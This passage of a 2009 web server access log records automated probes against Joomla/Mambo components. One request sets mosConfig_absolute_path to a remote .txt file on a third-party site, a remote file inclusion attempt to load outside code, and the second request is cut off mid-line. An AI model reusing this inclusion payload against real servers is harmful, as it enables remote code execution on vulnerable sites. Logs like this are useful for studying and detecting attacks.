58.184.252.3 - - [07/Sep/2009:11:45:19 -0700] "GET /logs/access_080627.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:45:28 -0700] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_pa